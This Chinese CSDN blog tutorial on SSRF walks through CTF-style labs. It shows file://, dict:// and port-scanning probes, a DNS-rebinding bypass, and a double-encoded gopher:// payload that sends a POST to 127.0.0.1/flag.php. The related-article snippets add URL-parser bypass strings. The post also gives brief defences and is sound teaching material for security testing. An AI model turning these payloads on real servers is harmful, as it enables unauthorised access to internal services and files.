渗透测试之SSRF漏洞

最新推荐文章于 2024-06-05 10:54:58 发布
最新推荐文章于 2024-06-05 10:54:58 发布
阅读量1.1k 收藏 16
点赞数 19
分类专栏: 渗透测试 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52177486/article/details/136196398
版权
本文详细介绍了SSRF漏洞的原理、在在线服务中的常见场景,如翻译、图片下载等,列举了php和Java中的漏洞函数,并展示了利用伪协议进行内网探测和攻击的实例。同时,文章总结了如何通过寻找传参点、判断回显和尝试不同协议来挖掘漏洞,并提出了设置IP白名单和禁止特定协议作为防御措施。
摘要由CSDN通过智能技术生成

SSRF(服务端请求伪造漏洞)由于服务端提供了从其他服务器应用获取数据的功能,但又没有对目标地址做严格的过滤与限制,导致攻击者可以传入任意地址来让后端服务器对其发起请求,并返回对该目标地址请求的数据。

漏洞场景:在线翻译、转码服务、图片的加载与下载、图片文章的收藏功能、社交分享(数据请求要想另一个服务器发起)

功能点:参数传的是一个url(形如:?url=http://abc.com/1.jpg) 除url外敏感的参数还有share、wap、link、src、source、target比参数名更重要的是看参数值是否为一个url地址。

漏洞函数:php中file_get_content()、fsockopen()、fopen()、curl_exec()、curl()、read_file()

java中HttpClient、OKHTTP()、HTTPRequest

漏洞函数的一般特点是会发起请求

SSRF漏洞实战

1、发现功能点

将地址更改为www.baidu.com发现有回显的访问

如果是不回显的,可以访问到自己部署的服务器看是否有请求,或dnslog平台

利用SSRF可以进行内网的探测,伪协议上传从而getshell

(伪协议读取文件)

dict://127.0.0.1:80伪协议可以看到目标端口的指纹信息

1、找到传参点,看是否有回显

2、apache的默认网站目录var/www/html/flag.php

(端口扫描)

1、找到传参点,看是否有回显

2、获取到信息后根据提示(8000-9000)端口,抓包进行爆破。爆破得到一个长度不同的包,找到flag

(DNS重绑定Bypass)

1、输入访问文件地址,发现被禁掉

2、重定向dns

将127.0.0.1改为如下图,访问拿到flag

(POST请求)

抓一个post包为构造gopher(这里要在源代码中添加提交按钮)

1、构建gopher协议请求包,请求包的内容有(post host(127.0.0.1:80)content-type content-length以及key值)

2、把请求包进行url编码

POST%20%2fflag.php%20HTTP%2f1.1%0AHost:%20127.0.0.1:80%0AContent-Type:%20application%2fx-www-form-urlencoded%0AContent-Length:%2036%0A%0Akey=b06fe6c4a10ae58176ee2b520c927017

3、把编码后的内容里面所有%0A编码为%0D%0A(\r变为\r\n)

POST%20%2fflag.php%20HTTP%2f1.1%0D%0AHost:%20127.0.0.1:80%0D%0AContent-Type:%20application%2fx-www-form-urlencoded%0D%0AContent-Length:%2036%0D%0A%0D%0Akey=b06fe6c4a10ae58176ee2b520c927017

4、进行url编码形成payload

POST%2520%252fflag.php%2520HTTP%252f1.1%250D%250AHost:%2520127.0.0.1:80%250D%250AContent-Type:%2520application%252fx-www-form-urlencoded%250D%250AContent-Length:%252036%250D%250A%250D%250Akey=b06fe6c4a10ae58176ee2b520c927017

5、再参数传入点赋值发送请求(?url=gopher://127.0.0.1:80/_payload)

url=gopher://127.0.0.1:80/_POST%2520%252fflag.php%2520HTTP%252f1.1%250D%250AHost:%2520127.0.0.1:80%250D%250AContent-Type:%2520application%252fx-www-form-urlencoded%250D%250AContent-Length:%252036%250D%250A%250D%250Akey=b06fe6c4a10ae58176ee2b520c927017

总结一下SSRF挖掘漏洞

1、寻找传参点url,如?url=http://xxxx,并且结合业务功能点一起判断,如转载,在线翻译等

2、判断SSRF有无回显

3、尝试SSRF哪些协议可以使用

4、dict协议用于探测端口指纹信息,gopher协议可以发送get或post请求,file协议可以用于文件读取

SSRF的防御

1、设置IP白名单

2、禁止不需要的协议(如gopher、dict)

little whhite
关注
  • 19
    点赞
  • 16
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SSRF_ex:SSRF漏洞测试、利用 SSRF vulnerability testing and utilization
05-08
SSRF_ex SSRF漏洞测试、利用 SSRF vulnerability testing and utilization SSRF [+] 服务端请求伪造,当作跳板攻击内网服务 [+] 扫描内部网络、服务 [+] 访问本机敏感文件 [+] 向特定端口发送数据包、payload . ├── exploit │   └── redis.py ├── lib │   ├── check_bypass.py │   ├── check.py │   ├── common.py │   ├── config.py │   ├── scan.py │   ├── test │   └── xmltest.xml ├── plugin │   └── weblogic.py ├── result │   ├── 192.168.1.107 │   │   ├── file_content.log │
Web安全 SSRF漏洞测试和利用.(读取服务器的任何文件)
网络安全领域___专研者.
03-04 4293
SSRF(Server-Side Request Forgery)服务端请求为伪造,SSRF是一种由攻击者构造形成由服务端发起请求的一个漏洞。(例如:攻击者操作服务端从指定URL地址获取网页文本内容,加载指定地址的图片等,利用的是服务端的请求伪造)SSRF利用存在缺陷的Web应用作为代理攻击远程和本地的服务器.
SSRF漏洞(详解)
最新发布
qq_70584783的博客
06-05 494
SSRF(Server-Side Request Forgery,服务器端请求伪造)是一种网络安全漏洞,允许攻击者通过利用不安全Web应用程序来伪造服务器端的请求。
渗透测试SSRF
Hi~ 土拨鼠
12-29 1800
文章目录服务端请求伪造概述危害产生SSRF 漏洞的代码file_get_contents()函数curl_exec()函数利用访问正常的文件端口扫描(扫描内网的机器)读取系统本地文件内网Web 应用指纹识别攻击内网应用Weblogic 从SSRF 到redis 未授权访问到getShell利用redis 反弹ShellSSRF 漏洞挖掘防御 服务端请求伪造 SSRF (Server-side Request Forgery,服务器端请求伪造)是一种攻击者发起的伪造由服务器端发起请求的一种攻击,也是常见web
web渗透测试----15、SSRF漏洞(服务端请求伪造漏洞
七天
07-02 6596
SSRF漏洞是一种在未能获取服务器权限时,利用服务器漏洞,由攻击者构造请求,服务器端发起请求的安全漏洞,攻击者可以利用该漏洞诱使服务器端应用程序向攻击者选择的任意域发出HTTP请求。 很多Web应用都提供了从其他的服务器上获取数据的功能,根据用户指定的URL,Web应用可以获取图片、下载文件、读取文件内容等。这种功能如果被恶意使用,将导致存在缺陷的Web应用被作为代理通道去攻击本地或远程服务器。这种形式的攻击被称为服务端请求伪造攻击。 一般情况下,SSRF攻击的目标是外网无法访问的内部系统。 文章目录前
SSRF漏洞
R3332136304的博客
11-25 2842
SSRF中协议的使用 SSRF,服务端请求伪造漏洞,可通过该漏洞对服务端所在网络进行扫描,信息收集及漏洞利用 常见出现SSRF漏洞场景,如 这种类型的请求,服务端通过一个链接去访问其他url的资源,我们就可以对该请求进行SSRF漏洞测试,通过DNSLog或者通过nc监听地址去进行测试,如使用nc监听9999端口 如图,nc显示来着服务端10.0.0.13的HTTP请求,证实该url存在SSRF漏洞。 如需进行下一步利用,我们可以测试SSRF所支持的协议,如: file:// dict:// ftp:/
SSRF(Server Side Request Forgery,SSRF)漏洞.pdf
07-05
讲述服务端请求伪造(Server Side Request Forgery,SSRF)攻防
无回显漏洞测试SSRF辅助平台提供DNSLOG,HTTPLOG等功能
01-20
平台使用Java编写,提供DNSLOG,HTTPLOG等功能,辅助渗透测试过程中无回显漏洞SSRF等漏洞的验证和利用。 主要功能 DNSLOG HTTPLOG 自定义DNS解析 DNS Rebinding 自定义HTTP Response(Response内容、状态码、Header...
30 天渗透测试练习2.pdf
10-06
渗透测试的目的是找出系统中的安全漏洞,防止真正的恶意攻击者利用这些漏洞进行非法活动。以下是给定内容中涉及的一些关键知识点: 1. **事件响应路径(Incident Responder Path)**:在网络安全事件发生时,了解...
常考渗透测试面试题.pdf
09-29
渗透测试面试题 本文总结了渗透测试面试题,涵盖了渗透测试的各种知识点,包括漏洞类型、漏洞原理、修复方案、工具使用、Webshell上传、SQL注入、XSS、CSRF、SSRF、XML注入、逻辑漏洞、越权访问、Java和PHP框架、...
思维导图, 安全领域PHP代码审计;二进制漏洞分析;企业安全防御;渗透测试
06-30
包含一下从工具使用,到源码审计,到渗透测试思路,操作系统安全评估等.系统得给大家整理了学习方法. Nmap PHP代码审计 powershell语法 python regrex python SQLMAP SQLMAP-2 SSRF vi vim2 W3af web安全 web前端知识...
SSRF-Testing:SSRF(服务器端请求伪造)测试资源
04-23
SSRF(服务器端请求伪造)测试资源 基于快速URL的绕过: http://google.com:80+&@127.88.23.245:22/#+@google.com:80/ http://127.88.23.245:22/+&@google.com:80#+@google.com:80/ http://google.com:80+&@google.com:80#+@127.88.23.245:22/ http://127.88.23.245:22/?@google.com:80/ http://127.88.23.245:22/#@www.google.com:80/ http://google.com:80\\@127.88.23.245:22/ htaccess-各种情况下的重定向测试 状态码:300、301、302、303、305、307、308 文件类型:jpg,
分享关于ssrf的检测技巧
hhiollk的博客
03-27 1701
SSRF(Server Side Request Forgery),翻译过来就是服务器请求伪造,意味着攻击者可以伪造来自服务器端的请求,并获取攻击者需要获取的数据。SSRF 漏洞出现的场景1.能够对外发起网络请求的地方,就可能存在 SSRF 漏洞2.远程资源调用功能(调用url,加载图片、在线翻译等)3.文件上传功能,在上传点修改type=url,将type=file改为type=url,然后将上传内容改为url。
Web漏洞-SSRF漏洞(详细)
Ays.Ie的博客
03-10 2889
该篇为Web漏洞-SSRF漏洞(详细)
记一次偶然的SSRF漏洞挖掘与测试
不想当脚本小子的脚本小子
03-24 352
打开界面是一个注册界面 提交注册后抓包:
网络安全——SSRF漏洞
A906003660的博客
07-31 217
网络安全SSRF漏洞
ssrf-test
0xcc'Blog
06-06 341
SSRF(Server-Side Request Forgery:服务器端请求伪造) SSRF其形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能,但又没有对目标地址做严格过滤与限制,导致攻击者可以传入任意的地址来让后端服务器对其发起请求,并返回对该目标地址请求的数据。 简单来说,SSRF就是根据PHP里的函数支持的网络协议写出payload,从而对服务器的内网进行攻击。 ...
SSRF漏洞详解(全面)
m0_64481831的博客
02-20 1295
SSRF往往是因为没有对目标地址进行过滤或限制SSRF相关的危险函数:file_get_contents()、fsockopen()、curl_exec()SSRF相关危险协议:file://、dict://、http://、万精油gopher://SSRF几大绕过:利用[::]绕过、利用@或。绕过、利用短地址绕过、利用IP地址转换绕过、利用一些特殊符号绕过SSRF判断方法分为有回显、半回显、无回显情况,无回显情况利用DNS带外测试
SSRF测试(Server Side Request Forgery)(owasp)
qq_1062290728的博客
03-14 821
原文 概述 web应用经常与内部或外部资源进行交互。虽然你可能期望只有预期的资源才能处理你发送的数据,然而处理不当的数据可能产生注入攻击。其中一种注入攻击是ssrf。一个成功的ssrf攻击能够授予攻击者访问内部服务、访问内部文件、执行受限操作的权限。在一些情况下,它甚至导致RCE。 测试目标 确认ssrf注入点 测试注入点是否可利用 评估漏洞的严重程度 如何测试测试ssrf时,你试图使目标服务器无意中加载或报错可能是恶意的内容。最常见的测试是本地和远程文件包含。ssrf还有另一方面:一种信任关系。通
DNSLog渗透测试活动事件
08-11
渗透测试中,DNSlog通常被用于以下场景:SQL注入盲注、XSS盲打、无回显的命令执行、无回显的SSRF和无回显的XXE(Blind XXE)。通过使用DNSlog,渗透测试人员可以获取目标系统的敏感信息,并进一步分析和攻击目标...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值